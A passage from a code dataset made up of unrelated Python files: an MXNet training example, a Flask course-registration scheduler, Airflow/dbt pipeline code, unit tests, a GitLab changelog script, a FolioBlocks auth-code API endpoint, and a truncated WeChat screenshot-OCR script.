mx.context.gpu(1)], [mx.context.gpu(2), mx.context.gpu(3)]]\nelse:\n contexts = [mx.context.cpu(), mx.context.cpu()]\n\n#--------------------------------------------------------------------------------\n# module 1\n#--------------------------------------------------------------------------------\ndata = mx.symbol.Variable('data')\nfc1 = mx.symbol.FullyConnected(data, name='fc1', num_hidden=128)\nact1 = mx.symbol.Activation(fc1, name='relu1', act_type=\"relu\")\n\nmod1 = mx.mod.Module(act1, label_names=[], context=contexts[0])\n\n#--------------------------------------------------------------------------------\n# module 2\n#--------------------------------------------------------------------------------\ndata = mx.symbol.Variable('data')\nfc2 = mx.symbol.FullyConnected(data, name = 'fc2', num_hidden = 64)\nact2 = mx.symbol.Activation(fc2, name='relu2', act_type=\"relu\")\nfc3 = mx.symbol.FullyConnected(act2, name='fc3', num_hidden=10)\nsoftmax = mx.symbol.SoftmaxOutput(fc3, name = 'softmax')\n\nmod2 = mx.mod.Module(softmax, context=contexts[1])\n\n#--------------------------------------------------------------------------------\n# Container module\n#--------------------------------------------------------------------------------\nmod_seq = mx.mod.SequentialModule()\nmod_seq.add(mod1).add(mod2, take_labels=True, auto_wiring=True)\n\n\n#--------------------------------------------------------------------------------\n# Training\n#--------------------------------------------------------------------------------\nn_epoch = 2\nbatch_size = 100\nbasedir = os.path.dirname(__file__)\nget_data.get_mnist(os.path.join(basedir, \"data\"))\n\ntrain_dataiter = mx.io.MNISTIter(\n image=os.path.join(basedir, \"data\", \"train-images-idx3-ubyte\"),\n label=os.path.join(basedir, \"data\", \"train-labels-idx1-ubyte\"),\n data_shape=(784,),\n batch_size=batch_size, shuffle=True, flat=True, silent=False, seed=10)\nval_dataiter = mx.io.MNISTIter(\n image=os.path.join(basedir, \"data\", \"t10k-images-idx3-ubyte\"),\n label=os.path.join(basedir, \"data\", \"t10k-labels-idx1-ubyte\"),\n data_shape=(784,),\n batch_size=batch_size, shuffle=True, flat=True, silent=False)\n\nlogging.basicConfig(level=logging.DEBUG)\nmod_seq.fit(train_dataiter, eval_data=val_dataiter,\n optimizer_params={'learning_rate':0.01, 'momentum': 0.9}, num_epoch=n_epoch)\n\n","repo_name":"hpi-xnor/BMXNet","sub_path":"example/module/sequential_module.py","file_name":"sequential_module.py","file_ext":"py","file_size_in_byte":2691,"program_lang":"python","lang":"en","doc_type":"code","stars":347,"dataset":"github-code","pt":"37"} +{"seq_id":"72715693867","text":"import requests\n#import threading\n#import time\nfrom datetime import datetime\nfrom time import sleep\nimport asyncio\nimport threading\nimport json\n\n#import schedule\nimport flask\n\nfrom courses import Semester, Course\nfrom coursedb import CourseDB\nfrom user import User\nfrom utils import url_generator, preprocess_user_input\n\nCOURSE_DATABASE_FILENAME = 'Course_Info.xlsx'\nSCHEDULED_EVENTS_INTERVAL = 1 # seconds per checking scheduled events\nDEFAULT_TIME = datetime(2022, 12, 11, 20, 0, 0)\nDEFAULT_SEMESTER = ('Spring', 2023)\n\nasync def run_at(dt, method):\n await asyncio.sleep((dt - datetime.now()).total_seconds()) # requires python version 3.8 or above\n return await method\n\nasync def register(user : User):\n print('Performing course registration for user {user.id}:')\n user.register() # runs the register() method on the user exactly once \n\napp = flask.Flask(__name__) # initialize the Flask app\ncoursedb = CourseDB(COURSE_DATABASE_FILENAME) # initialize the database\nuser = User(coursedb) # initialize a default user for now\nuser.set_active_semester(*DEFAULT_SEMESTER)\nuser.prep_auth() # capture the user's auth token by having them sign in to the student link\nloop = asyncio.new_event_loop() # initialize an event loop to schedule registration at specific times\n\ndef run_app():\n app.run(host='127.0.0.1', port=53303)\n\ndef run_loop():\n loop.run_forever()\n\n@app.route('/', methods=['GET', 'POST'])\ndef default_output():\n print(flask.request.get_json())\n print(flask.request.json)\n response = {'status': 'Flask server online'}\n return flask.jsonify(response)\n\n@app.route('/request', methods=['POST'])\ndef api_request_handler() -> flask.Response: # bind the Flask input to this method\n data = flask.request.json\n schedule_registration(data)\n json_file = {}\n #json_file['query'] = 'response'\n return flask.jsonify(json_file)\n\ndef schedule_registration(data : str):\n print(data)\n scheduled_time = 'now'\n if 'time' not in data:\n time_raw = 'NOW'\n else:\n time_raw = data['time']\n courses = json.loads(data['classList'])\n plan = 'plan' in data\n if time_raw != 'NOW':\n try:\n scheduled_time = datetime.strptime(time_raw, r'%d/%m/%Y %I:%M %p') # dd/mm/yyyy hh:mm [AM/PM]\n except:\n print(f\"Warning: defaulting to time {DEFAULT_TIME}\")\n scheduled_time = DEFAULT_TIME # default time to avoid errors\n print(f\"Scheduling courses {courses} at {scheduled_time}\")\n for course in courses:\n user.add_course(Course(coursedb, *preprocess_user_input(course[0])))\n if time_raw != 'NOW':\n sleeptime : int = (scheduled_time - datetime.now()).seconds + 86400 * (scheduled_time - datetime.now()).days\n print(f'Waiting {sleeptime} seconds. . .')\n sleep(sleeptime)\n user.register()\n #loop.create_task(run_at(scheduled_time, register(user))) \n\ndef test_scheduler():\n schedule_registration(data = {'classList': '[[\"CAS AA385 A1\"]]', 'time': 'NOW'})\n\n#https://www.bu.edu/link/bin/uiscgi_studentlink.pl/1670822671?SelectIt=0001151409&ModuleName=reg%2Fadd%2Fconfirm_classes.pl&AddPreregInd=&AddPlannerInd=&ViewSem=Spring+2023&KeySem=20234&PreregViewSem=&PreregKeySem=&SearchOptionCd=S&SearchOptionDesc=Class+Number&MainCampusInd=&BrowseContinueInd=&ShoppingCartInd=&ShoppingCartList=\n#https://www.bu.edu/link/bin/uiscgi_studentlink.pl/1670822639?SelectIt=0001151409&ModuleName=reg%2Fadd%2Fconfirm_classes.pl&AddPreregInd=&AddPlannerInd=&ViewSem=Spring+2023&KeySem=20234&PreregViewSem=&PreregKeySem=&SearchOptionCd=S&SearchOptionDesc=Class+Number&MainCampusInd=&BrowseContinueInd=&ShoppingCartInd=&ShoppingCartList=\n\n#https://www.bu.edu/link/bin/uiscgi_studentlink.pl/1670820688?SelectIt=0001151409&ModuleName=reg%2Fadd%2Fconfirm_classes.pl&AddPreregInd=&AddPlannerInd=&ViewSem=Spring+2023&KeySem=20234&PreregViewSem=&PreregKeySem=&SearchOptionCd=S&SearchOptionDesc=Class+Number&MainCampusInd=&BrowseContinueInd=&ShoppingCartInd=&ShoppingCartList=\n#https://www.bu.edu/link/bin/uiscgi_studentlink.pl/1670820707?SelectIt=0001151409&College=CAS&Dept=AA&Course=385&Section=A1&ModuleName=reg%2Fadd%2Fconfirm_classes.pl&AddPreregInd=&AddPlannerInd=&ViewSem=Spring+2022&KeySem=20223&PreregViewSem=&PreregKeySem=&SearchOptionCd=S&SearchOptionDesc=Class+Number&MainCampusInd=&BrowseContinueInd=&ShoppingCartInd=&ShoppingCartList=\n\n#https://www.bu.edu/link/bin/uiscgi_studentlink.pl/1670820688?SelectIt=0001151409&ModuleName=reg%2Fadd%2Fconfirm_classes.pl&AddPreregInd=&AddPlannerInd=&ViewSem=Spring+2023&KeySem=20234&PreregViewSem=&PreregKeySem=&SearchOptionCd=S&SearchOptionDesc=Class+Number&MainCampusInd=&BrowseContinueInd=&ShoppingCartInd=&ShoppingCartList=\n#https://www.bu.edu/link/bin/uiscgi_studentlink.pl/1670820825?SelectIt=0001151409&ModuleName=reg%2Fadd%2Fconfirm_classes.pl&AddPreregInd=&AddPlannerInd=&ViewSem=Spring+2022&KeySem=20223&PreregViewSem=&PreregKeySem=&SearchOptionCd=S&SearchOptionDesc=Class+Number&MainCampusInd=&BrowseContinueInd=&ShoppingCartInd=&ShoppingCartList=\n\nif __name__ == '__main__':\n test_scheduler()\n loop_thread = threading.Thread(target=run_loop)\n loop_thread.start()\n print('Asyncio initialization complete')\n app_thread = threading.Thread(target=run_app)\n app_thread.start()\n app_thread.join()\n print('Flask app forcibly stopped; stopping loop')\n loop.stop()\n print('Press CTRL+C to close remaining threads')\n sleep(1)\n exit()\n while True: \n sleep(1) #catch ctrl + c if exit() fails somehow\n \n \n\n\"\"\"\nusers : dict(User) = {}\n@app.route('/adduser')\ndef add_user(username : str):\n users[username] = User(coursedb)\n\"\"\"\n","repo_name":"corndog-overflow/courseRegProject","sub_path":"backend/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39458857621","text":"\"\"\"Stores utilility functions that don't go anywhere else.\n\"\"\"\nimport typing\n\nV = typing.TypeVar(\"V\")\n\n\ndef split_dict(\n input_dict: typing.Mapping[str, V], include: typing.Iterable[str],\n) -> typing.Tuple[typing.Dict[str, V], typing.Dict[str, V]]:\n \"\"\"Splits a dict into two by key\n\n Parameters:\n input_dict: The dict to split\n include: The keys to put into the include dict\n\n Returns:\n `included, excluded`:\n A dict with the included keys, and a dict with the excluded keys\n \"\"\"\n excluded_dict = dict(**input_dict) # so we don't modify original\n included_dict = {\n key: excluded_dict.pop(key) # remove from excluded dict\n for key in include\n if key in excluded_dict\n }\n return included_dict, excluded_dict\n","repo_name":"aloisklink/flirextractor","sub_path":"flirextractor/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"1705022345","text":"from random import randint\n\n\ndef eh_par(numero):\n return numero % 2 == 0\n\n\ndef soma_par(lista):\n soma = 0\n\n for num in lista:\n if eh_par(num):\n soma += num\n return soma\n\n\ndef sorteio():\n numeros = list()\n\n print('Sorteando os 5 valores da lista: ', end='')\n for i in range(0, 5):\n aleatorio = randint(1, 100)\n print(f'{aleatorio}', end=' ')\n numeros.append(aleatorio)\n\n soma = soma_par(numeros)\n\n print(' PRONTO!')\n print(f'Somando os valores pares de {numeros}, temos {soma}')\n\n\nsorteio()\n","repo_name":"Akylles/Python---Gustavo-Guanabara","sub_path":"desafios/100.py","file_name":"100.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34184219539","text":"import os\nimport time\n\ndir_path = \"../time/\"\nwhile True:\n current_time = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n file_name = current_time.replace(\":\", \"_\") + \".txt\"\n file_path = os.path.join(dir_path, file_name)\n with open(file_path, \"w+\") as f:\n f.write(current_time)\n time.sleep(10)\n\n","repo_name":"randomanimedude/TCS","sub_path":"Lab_04/time_checker/clock/clock.py","file_name":"clock.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13372620343","text":"\"\"\"\nUpdate changelog.\n\nRequirements:\n\n- python-gitlab\n\nUsage:\n\npython scripts/update-changelog.py 3.5.0 3.5.1\n\n\"\"\"\nimport datetime\nimport os\nimport sys\n\nimport gitlab\n\nexcluded_labels = ['duplicate', 'question', 'invalid', 'wontfix', 'rejected', 'technical task', 'news', \"annoucement\", 'not our bug', 'discussion', 'website', 'support']\n\n\ndef find_milestone_id(project):\n global milestone_id\n milestone_id = None\n for milestone in project.milestones.list():\n if milestone.title == milestone_title:\n milestone_id = milestone.id\n break\n\n if milestone_id is None:\n print(\"failed to find requested milestone\")\n sys.exit(1)\n\n return milestone_id\n\n\ndef find_milestone_issues(project):\n issues = []\n for issue in project.issues.list(all=True):\n if issue.milestone is not None and issue.milestone[\"id\"] == milestone_id and issue.state == \"closed\" and not is_excluded(issue):\n issues.append(issue)\n return issues\n\n\ndef is_excluded(issue):\n for label in issue.labels:\n if label in excluded_labels:\n return True\n return False\n\n\ndef find_milestone_merge_requests(project):\n global merge_requests\n merge_requests = []\n for mr in project.mergerequests.list(all=True):\n if mr.milestone is not None and mr.milestone[\"id\"] == milestone_id:\n merge_requests.append(mr)\n return merge_requests\n\n\ndef title(milestone_title):\n now = datetime.datetime.now()\n return f\"## [{milestone_title}](https://gitlab.com/ColinDuquesnoy/MellowPlayer/tree/{milestone_title}) ({now.year}-{now.month}-{now.day})\"\n\n\ndef full_changelog(previous_milestone, new_milestone):\n return f\"[Full Changelog](https://gitlab.com/ColinDuquesnoy/MellowPlayer/compare/{previous_milestone}...{new_milestone})\"\n\n\ndef is_feature(issue):\n for label in issue.labels:\n if \"feature\" in label:\n return True\n return False\n\n\ndef is_bug(issue):\n for label in issue.labels:\n if \"bug\" in label or \"broken\" in label:\n return True\n return False\n\n\ndef implemented_features(issues):\n formatted_issues = [\n \"\"\n \"**Implemented enhancements:**\",\n \"\"\n ]\n for issue in issues:\n if is_feature(issue):\n formatted_issues.append(format_issue(issue))\n formatted_issues.append(\"\")\n return formatted_issues\n\n\ndef fixed_bugs(issues):\n formatted_issues = [\n \"\"\n \"**Fixed bugs:**\",\n \"\"\n ]\n for issue in issues:\n if is_bug(issue):\n formatted_issues.append(format_issue(issue))\n formatted_issues.append(\"\")\n return formatted_issues\n\n\ndef closed_issues(issues):\n formatted_issues = [\n \"\",\n \"**Closed issues:**\",\n \"\"\n ]\n for issue in issues:\n if not is_bug(issue) and not is_feature(issue):\n formatted_issues.append(format_issue(issue))\n formatted_issues.append(\"\")\n return formatted_issues\n\n\ndef merged_merge_requests(merge_requests):\n formatted_issues = [\n \"\",\n \"**Merged merge requests:**\",\n \"\"\n ]\n for mr in merge_requests:\n formatted_issues.append(format_merge_request(mr))\n formatted_issues.append(\"\")\n return formatted_issues\n\n\ndef format_issue(issue):\n return f\"- {issue.title} [\\\\#{issue.iid}](https://gitlab.com/ColinDuquesnoy/MellowPlayer/issues/{issue.iid})\"\n\n\ndef format_merge_request(mr):\n formatted = f\"- {mr.title} [\\\\#{mr.iid}](https://gitlab.com/ColinDuquesnoy/MellowPlayer/merge_requests/{mr.iid})\"\n author = mr.author['username']\n if author != \"ColinDuquesnoy\":\n formatted += f\" ([{author}](https://gitlab.com/{author}))\"\n return formatted\n\n\ndef write_changelog(content):\n with open('CHANGELOG.md', 'r') as f:\n initial_content = f.read()\n initial_content = '\\n'.join(initial_content.splitlines()[1:])\n\n with open('CHANGELOG.md', 'w') as f:\n f.write(\"# Change log\\n\\n\" + content + initial_content)\n\n\nprevious_milestone_title = sys.argv[1]\nmilestone_title = sys.argv[2]\ngl = gitlab.Gitlab(\"https://gitlab.com\", private_token=os.getenv(\"GITLAB_TOKEN\"))\nproject = gl.projects.get(\"9602590\")\nmilestone_id = find_milestone_id(project)\nissues = find_milestone_issues(project)\nmerge_requests = find_milestone_merge_requests(project)\n\ncontent = [\n title(milestone_title),\n full_changelog(previous_milestone_title, milestone_title),\n \"\"\n]\n\ncontent += implemented_features(issues)\ncontent += fixed_bugs(issues)\ncontent += closed_issues(issues)\ncontent += merged_merge_requests(merge_requests)\nwrite_changelog('\\n'.join(content))\n","repo_name":"MellowPlayer/MellowPlayer","sub_path":"scripts/update-changelog.py","file_name":"update-changelog.py","file_ext":"py","file_size_in_byte":4603,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"43563485734","text":"from django.urls import path\nfrom .views import (\n UsersListView,\n UserDetailView,\n # PostCreateView,\n UserUpdateView,\n UserDeleteView,\n CreateEmailView,\n CreatePhoneView,\n\n)\nfrom . import views\n\nurlpatterns = [\n path('', views.home, name='users-home'),\n path('register/', views.register, name='register'),\n path('user//', UserDetailView.as_view(), name='user-detail'),\n path('user//update/', UserUpdateView.as_view(), name='user-update'),\n path('post//delete/', UserDeleteView.as_view(), name='user-delete'),\n path('update//email/', CreateEmailView.as_view(), name='email'),\n path('update//phone/', CreatePhoneView.as_view(), name='phone'),\n\n]","repo_name":"Ozborniasty/ansta_job","sub_path":"addressBook/users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73585907307","text":"from airflow import DAG\nfrom airflow.operators.bash_operator import BashOperator\nfrom datetime import datetime\nfrom airflow_dbt.operators.dbt_operator import (\n DbtSeedOperator,\n DbtRunOperator\n)\nfrom great_expectations_provider.operators.great_expectations import GreatExpectationsOperator\nimport os\n\n\n# Default settings\ndefault_args = {\n 'owner': 'airflow',\n 'start_date': datetime(2020, 5, 21)\n}\n\nPROJECT_HOME = '/opt/airflow'\nDBT_ROOT_DIR = os.path.join(PROJECT_HOME, 'dbt')\nDBT_PROJECT_DIR = os.path.join(DBT_ROOT_DIR, 'sts')\nDBT_TARGET = 'dev'\nDBT_TARGET_DIR = os.path.join(DBT_PROJECT_DIR, 'target')\nGE_ROOT_DIR = os.path.join(PROJECT_HOME, 'great_expectations')\n\ndag = DAG(\n dag_id='example_dag',\n schedule_interval=None,\n default_args=default_args\n)\n\n\n\ndbt_seed = DbtSeedOperator(\n task_id='dbt_seed',\n dir=DBT_PROJECT_DIR,\n profiles_dir=DBT_ROOT_DIR,\n target=DBT_TARGET,\n dag=dag\n)\n\n\nvalidate_load = GreatExpectationsOperator(\n task_id='validate_load',\n assets_to_validate=[\n {\n 'batch_kwargs': {\n 'datasource': 'spark-thrift-server',\n 'schema': 'example',\n 'table': 'taxi_zone_lookup',\n 'data_asset_name': 'taxi_zone_lookup'\n },\n 'expectation_suite_name': 'custom_sql_query.warning'\n }\n ],\n data_context_root_dir=GE_ROOT_DIR,\n dag=dag\n)\n\n\ndbt_run = DbtRunOperator(\n task_id='dbt_run',\n dir=DBT_PROJECT_DIR,\n profiles_dir=DBT_ROOT_DIR,\n target=DBT_TARGET,\n dag=dag\n)\n\n\nvalidate_transform = GreatExpectationsOperator(\n task_id='validate_transform',\n expectation_suite_name='taxi_zone_incremental.source',\n batch_kwargs={\n 'datasource': 'spark-thrift-server',\n 'schema': 'example',\n 'table': 'taxi_zone_incremental',\n 'data_asset_name': 'taxi_zone_incremental'\n },\n data_context_root_dir=GE_ROOT_DIR,\n dag=dag\n)\n\nge_docs_generate = BashOperator(\n task_id='ge_docs_generate',\n bash_command=f'great_expectations docs build --directory {GE_ROOT_DIR} --assume-yes',\n dag=dag\n)\n\n\ndbt_seed >> validate_load >> dbt_run >> validate_transform >> ge_docs_generate\n","repo_name":"gumartinm/dbt-sts-ge","sub_path":"dags/example_dag.py","file_name":"example_dag.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"36973838373","text":"#!/usr/bin/env python\n#-*- coding: utf-8 -*-\n\nimport sys\nif len(sys.argv) > 1:\n\tsys.path.insert(0, sys.argv.pop(1))\n\nimport unittest\n\nimport viennagrid.wrapper\n\nfrom utils import equal\n\nclass TestAlgorithmsCartesian2D(unittest.TestCase):\n\tdef setUp(self):\n\t\tpass\n\t\n\tdef test_inner_prod(self):\n\t\tax = 2\n\t\tay = 5\n\t\ta = viennagrid.wrapper.PointCartesian2D(ax, ay)\n\t\t\n\t\tbx = 8\n\t\tby = 4\n\t\tb = viennagrid.wrapper.PointCartesian2D(bx, by)\n\t\t\n\t\tres = a.inner_prod(b)\n\t\tself.assertEqual(res, ax * bx + ay * by)\n\t\t\n\t\tres = b.inner_prod(a)\n\t\tself.assertEqual(res, ax * bx + ay * by)\n\nclass TestAlgorithmsCartesian2D(unittest.TestCase):\n\tdef setUp(self):\n\t\tpass\n\t\n\tdef test_inner_prod(self):\n\t\tax = 2\n\t\tay = 5\n\t\taz = 10\n\t\ta = viennagrid.wrapper.PointCartesian3D(ax, ay, az)\n\t\t\n\t\tbx = 8\n\t\tby = 4\n\t\tbz = 123\n\t\tb = viennagrid.wrapper.PointCartesian3D(bx, by, bz)\n\t\t\n\t\tres = a.inner_prod(b)\n\t\tself.assertEqual(res, ax * bx + ay * by + az * bz)\n\t\t\n\t\tres = b.inner_prod(a)\n\t\tself.assertEqual(res, ax * bx + ay * by + az * bz)\n\t\n\tdef test_cross_prod(self):\n\t\ta = viennagrid.wrapper.PointCartesian3D(1, 0, 0)\n\t\tb = viennagrid.wrapper.PointCartesian3D(0, 1, 0)\n\t\t\n\t\tres = a.cross_prod(b)\n\t\tself.assertEqual(res.coords, [0, 0, 1])\n\t\t\n\t\tres = a.cross_prod(b)\n\t\tself.assertEqual(res.coords, [0, 0, 1])\n\t\n\tdef test_norm(self):\n\t\tp = viennagrid.wrapper.PointCartesian3D(1, 2, 3)\n\t\tself.assertTrue(equal(p.norm_1(), 6))\n\t\tself.assertTrue(equal(p.norm_2(), 3.74))\n\t\tself.assertTrue(equal(p.norm_inf(), 3))\n\nif __name__ == '__main__':\n\tunittest.main()\n","repo_name":"jonancm/viennagrid-python","sub_path":"test/test_algorithms.py","file_name":"test_algorithms.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28484292529","text":"\"\"\"\nAdmin API — Exclusive endpoints for allowing actions that requires authentication from higher-ups to allow users for use of the platform.\n\nThis file is part of FolioBlocks.\n\nFolioBlocks is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.\nFolioBlocks is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.\nYou should have received a copy of the GNU General Public License along with FolioBlocks. If not, see .\n\"\"\"\n\n\n\"\"\"\n# Further Notice\nThis endpoint should be used for generating users as a associate/organization or as a node. When running this endpoint, ensure that you look for\n\n\"\"\"\n\nfrom asyncio import gather\nfrom datetime import datetime, timedelta\nfrom http import HTTPStatus\nfrom logging import Logger, getLogger\nfrom sqlite3 import IntegrityError\n\nfrom blueprint.models import auth_codes, users\nfrom blueprint.schemas import GenerateAuthInput\nfrom core.constants import (\n ASYNC_TARGET_LOOP,\n BaseAPI,\n NodeAPI,\n RequestPayloadContext,\n UserEntity,\n)\nfrom databases import Database\nfrom fastapi import APIRouter, Depends, Header, HTTPException\nfrom sqlalchemy import func, select\nfrom sqlalchemy.sql.expression import Insert, Select, Update\nfrom core.dependencies import EnsureAuthorized\nfrom utils.email import EmailService, get_email_instance\nfrom utils.processors import save_database_state_to_volume_storage\n\nlogger: Logger = getLogger(ASYNC_TARGET_LOOP)\n\nadmin_router = APIRouter(\n prefix=\"/admin\",\n tags=[BaseAPI.ADMIN.value],\n)\n\n\n@admin_router.post(\n \"/generate_auth\",\n tags=[NodeAPI.GENERAL_NODE_API.value],\n summary=\"Generates token for the registration of the user as a node or as a normal user.\",\n description=\"An exclusive API endpoint that generates token for users to register. This should be triggered by an admin.\",\n status_code=HTTPStatus.ACCEPTED,\n)\nasync def generate_auth_token_for_entities(\n *,\n payload: GenerateAuthInput,\n x_passcode: str = Header(\n ...,\n description=\"The special passcode that allows the generation of `auth_code`.\",\n ),\n authorizer_address=Depends(\n EnsureAuthorized(\n _as=[\n UserEntity.MASTER_NODE_USER,\n UserEntity.ORGANIZATION_DASHBOARD_USER,\n ],\n return_address_from_token=True,\n )\n ),\n) -> RequestPayloadContext:\n\n # ! We cannot append these dependencies from the function due to circular import dependencies.\n from core.dependencies import (\n PasscodeTOTP,\n generate_auth_token,\n get_database_instance,\n get_totp_instance,\n )\n\n database_instance: Database = (\n get_database_instance()\n ) # - Prioritize this instance before any other.\n\n # - Get necessary information from this address.\n authorizer_address_info_query: Select = select(\n [users.c.association, users.c.type, users.c.date_registered]\n ).where(\n (users.c.unique_address == authorizer_address)\n & (\n (users.c.type == UserEntity.MASTER_NODE_USER)\n | (users.c.type == UserEntity.ORGANIZATION_DASHBOARD_USER)\n )\n )\n\n authorizer_address_info = await database_instance.fetch_one(\n authorizer_address_info_query\n )\n\n if authorizer_address_info is None:\n raise HTTPException(\n detail=\"User attributes were not found. This is not possible due to being able to be authenticated in the first-layer. Please report this problem from the administrator.\",\n status_code=HTTPStatus.NOT_FOUND,\n )\n\n # - Only handle for the organization, since it has multiple association entries.\n # ! For the case of the master node, we don't need to do some extra validation.\n if authorizer_address_info.type is UserEntity.ORGANIZATION_DASHBOARD_USER: # type: ignore\n # - Filter out these users by getting the their address and the date.\n validate_date_registration_from_associates_query: Select = select(\n [func.count()]\n ).where(\n (users.c.date_registered < authorizer_address_info.date_registered)\n & (users.c.association == authorizer_address_info.association)\n ) # type: ignore\n\n # - Compare this address against others from their address.\n covered_by_date_associates = await database_instance.fetch_val(\n validate_date_registration_from_associates_query\n )\n\n if covered_by_date_associates:\n raise HTTPException(\n detail=\"You are not authorized to create the authentication code. Please ask the creator of the organization from the system.\",\n status_code=HTTPStatus.UNAUTHORIZED,\n )\n\n auth_instance: PasscodeTOTP | None = get_totp_instance()\n email_instance: EmailService | None = get_email_instance()\n require_new_token: bool = False # * A switch for allowing a token to be renewed by sending a new email with a new code.\n\n if auth_instance is None or email_instance is None or database_instance is None:\n raise HTTPException(\n detail=\"Instance is not yet ready. This means, the system is not yet ready to take special requests. Try again later.\",\n status_code=HTTPStatus.ACCEPTED,\n )\n\n if payload.role is UserEntity.MASTER_NODE_USER:\n raise HTTPException(\n detail=(\n f\"Role not allowed! There should only be one {UserEntity.MASTER_NODE_USER.value}.\",\n ),\n status_code=HTTPStatus.FORBIDDEN,\n )\n\n elif payload.role is UserEntity.STUDENT_DASHBOARD_USER:\n raise HTTPException(\n detail=(\n f\"Requesting an authentication code through this role ('{UserEntity.STUDENT_DASHBOARD_USER.value}') is not allowed.\",\n ),\n status_code=HTTPStatus.FORBIDDEN,\n )\n\n else:\n if auth_instance.verify(x_passcode):\n generated_token: str = generate_auth_token()\n\n try:\n # - First check, check if this user was already an existing user via checking the 'users' table.\n check_existing_user_via_users_query: Select = select(\n [func.count()]\n ).where(users.c.email == payload.email)\n\n user_email_exists_via_users = await database_instance.fetch_val(\n check_existing_user_via_users_query\n )\n\n if user_email_exists_via_users:\n raise HTTPException(\n detail=\"Cannot create authentication code due to the user already existing from the system! Please check and get their login credentials checked.\",\n status_code=HTTPStatus.FORBIDDEN,\n )\n\n # - Last step, check the given email from the authentication code table ('auth_codes').\n check_existing_user_via_auth_token_query: Select = select(\n [func.count(), auth_codes.c.expiration]\n ).where(auth_codes.c.to_email == payload.email)\n\n user_context_from_auth_codes = await database_instance.fetch_one(\n check_existing_user_via_auth_token_query\n )\n\n if (\n user_context_from_auth_codes.count\n and datetime.now() < user_context_from_auth_codes.expiration\n ):\n raise HTTPException(\n detail=\"The email associated from this request already has an authentication code!\",\n status_code=HTTPStatus.FORBIDDEN,\n )\n elif (\n user_context_from_auth_codes.count\n and datetime.now() >= user_context_from_auth_codes.expiration\n ):\n require_new_token = True\n logger.warning(\n \"An expired authentication code has been detected from one of the queried email, renewal will be processed. Check for the log regarding email services sending a renewed token.\"\n )\n\n # - Handle new token to be renewal or literally a new one.\n if require_new_token:\n update_expired_token_query: Update = (\n auth_codes.update()\n .where(auth_codes.c.to_email == payload.email)\n .values(token=generated_token)\n )\n await gather(\n database_instance.execute(update_expired_token_query),\n save_database_state_to_volume_storage(),\n )\n\n else:\n insert_generated_token_query: Insert = auth_codes.insert().values(\n code=generated_token,\n account_type=payload.role,\n to_email=payload.email,\n expiration=datetime.now() + timedelta(days=2),\n )\n await gather(\n database_instance.execute(insert_generated_token_query),\n save_database_state_to_volume_storage(),\n )\n\n # ! Do not change this, regardless of the token's existence and its state.\n # - I have no time for that.\n await email_instance.send(\n content=f\"

Auth Code for the Folioblock's {payload.role.value}!

Thank you for taking part in our ecosystem! To register, please enter the following auth code. Remember, do not share this code to anyone.

Auth Code: {generated_token}


Didn't know who sent this? Please consult your representives of your organization / institution regarding this matter.

Learn the development progression on Github.\",\n subject=f\"Auth Code for Registration as a {payload.role.value} at Folioblocks\",\n to=payload.email,\n )\n\n except IntegrityError as e:\n raise HTTPException(\n detail=f\"Cannot provide anymore authentication token to the requested user. Please report the following error: {e}\",\n status_code=HTTPStatus.FORBIDDEN,\n )\n\n logger.info(\n \"Authentication code has been sent from one the requested users. Check preceeding logs for more information.\"\n )\n\n return {\n \"detail\": f\"Invocation of the email for a registration as a '{payload.role.value}' were successful. Advise to check their email.\"\n }\n\n else:\n raise HTTPException(\n detail=\"Invalid TOTP passcode.\", status_code=HTTPStatus.NOT_ACCEPTABLE\n )\n","repo_name":"CodexLink/folioblocks","sub_path":"node/api/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":11204,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"41440639958","text":"import os\r\nimport keyboard\r\nimport time\r\nfrom aip import AipOcr\r\nfrom PIL import Image, ImageGrab\r\nimport sys,ctypes\r\n\r\ndef is_admin():\r\n try:\r\n return ctypes.windll.shell32.IsUserAnAdmin()\r\n except:\r\n return False\r\n\r\n\r\n\r\nif is_admin():\r\n\r\n keyboard.press_and_release('ctrl+alt+w')\r\n time.sleep(0.5)\r\n keyboard.press_and_release('ctrl+f')\r\n time.sleep(0.5)\r\n keyboard.write('文件传输助手')\r\n time.sleep(0.5)\r\n keyboard.press_and_release('enter')\r\n\r\n time.sleep(0.5)\r\n keyboard.press_and_release('alt+print screen')\r\n time.sleep(0.5)\r\n keyboard.press_and_release('ctrl+alt+w')\r\n time.sleep(0.5)\r\n\r\n # 将从屏幕获取到的截图存储到同级目录下\r\n image = ImageGrab.grabclipboard()\r\n image.save(\"pic.png\")\r\n time.sleep(0.5)\r\n img = Image.open('pic.png')\r\n width, height = img.size\r\n\r\n left = width / 2\r\n top = height / 2\r\n right = width\r\n bottom = height\r\n im1 = img.crop((left, top, right, bottom))\r\n im1.save('pic.png')\r\n\r\n # 此处填写你的APP参数信息\r\n APP_ID = 'YOUR APP_ID'\r\n API_KEY = 'YOUR API_KEY'\r\n SECRET_KEY = 'YOUR SECRET_KEY'\r\n\r\n client = AipOcr(APP_ID, API_KEY, 